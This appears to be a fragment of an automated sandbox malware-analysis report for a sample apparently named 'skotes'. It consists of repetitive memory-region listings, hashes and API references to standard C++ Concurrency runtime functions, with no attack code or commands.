                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                          • String ID: pExecutionResource
                                                          • API String ID: 1772865662-359481074
                                                          • Opcode ID: 99dc0ed684d8c8ec6e6612c7bc523f11e8890b7de7f676e8e4789c23388866ae
                                                          • Instruction ID: 2e9ccc4d86ee0f0618e87ede3564ffa92dde821e80032c3f6b82a27148884c88
                                                          • Opcode Fuzzy Hash: 99dc0ed684d8c8ec6e6612c7bc523f11e8890b7de7f676e8e4789c23388866ae
                                                          • Instruction Fuzzy Hash: 2A21DB756403099BCB08EFA4C842BFDB7F5BF48300F108069F605AB292DBB4AE05DB95
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C04F24
                                                          • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00C04F66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                          • String ID: count$ppVirtualProcessorRoots
                                                          • API String ID: 2663199487-3650809737
                                                          • Opcode ID: 2f3a9ab74d3814bac7235c994ee007eb37ad76d8f8e845bac0c6161dd42819fc
                                                          • Instruction ID: 22627bca1bc5ba7ac454b93191648e9f2982aa7e9c950e600d6a623bae25d2a5
                                                          • Opcode Fuzzy Hash: 2f3a9ab74d3814bac7235c994ee007eb37ad76d8f8e845bac0c6161dd42819fc
                                                          • Instruction Fuzzy Hash: 0421F235600219EFCB08EFA8C891EAEB7B5BF48310F104069FA16976D1DB71AE02DF51
                                                          APIs
                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C0BA0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                          • String ID: RoInitialize$RoUninitialize$combase.dll
                                                          • API String ID: 348560076-3997890769
                                                          • Opcode ID: 02a524bb344e90cc6d5c91a382eb0a35adf29c708667021494ada2d510d2b0da
                                                          • Instruction ID: 4b2a873e6f07ccc2d85e1f07efbce09a5405ffc491e879ef9131f7784e838472
                                                          • Opcode Fuzzy Hash: 02a524bb344e90cc6d5c91a382eb0a35adf29c708667021494ada2d510d2b0da
                                                          • Instruction Fuzzy Hash: 8201F5B0AB13195FDB10F7765C0DBAF319CAF02708F212429A550E21C2EF35C800DBA9
                                                          APIs
                                                          • SafeRWList.LIBCONCRT ref: 00C06E73
                                                            • Part of subcall function 00C04E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C04E7F
                                                            • Part of subcall function 00C04E6E: List.LIBCMT ref: 00C04E89
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C06E85
                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C06EAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                          • String ID: eventObject
                                                          • API String ID: 1288476792-1680012138
                                                          • Opcode ID: 949a6de95c6c84ac401731386dc75733d6bc31e0fd5c1596938b20329cb8ad0c
                                                          • Instruction ID: 71577565a05131f0a011403d3ea713baa9111fb200d77000593ee841ebfcf28a
                                                          • Opcode Fuzzy Hash: 949a6de95c6c84ac401731386dc75733d6bc31e0fd5c1596938b20329cb8ad0c
                                                          • Instruction Fuzzy Hash: D411E575950308E7DB24EBA4CC4AFEF76A85F00704F204569B529A61C1DBB49A04CB75
                                                          APIs
                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00C0A102
                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00C0A126
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0A139
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                          • String ID: pScheduler
                                                          • API String ID: 246774199-923244539
                                                          • Opcode ID: 9ad5de34d3fce3c87ac9200bd7e3dceb01657faaa7e4921b4224b0a8b0e63ca5
                                                          • Instruction ID: d803b4086d32ea5cdbb2c6c3e9c111ec9c7aece4f5bd60a76f147e0663ffbf5f
                                                          • Opcode Fuzzy Hash: 9ad5de34d3fce3c87ac9200bd7e3dceb01657faaa7e4921b4224b0a8b0e63ca5
                                                          • Instruction Fuzzy Hash: 0DF02736A44708E7C720FA55DC83C9EB7789E80B14F208279E916671C1DF70AF46C796
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
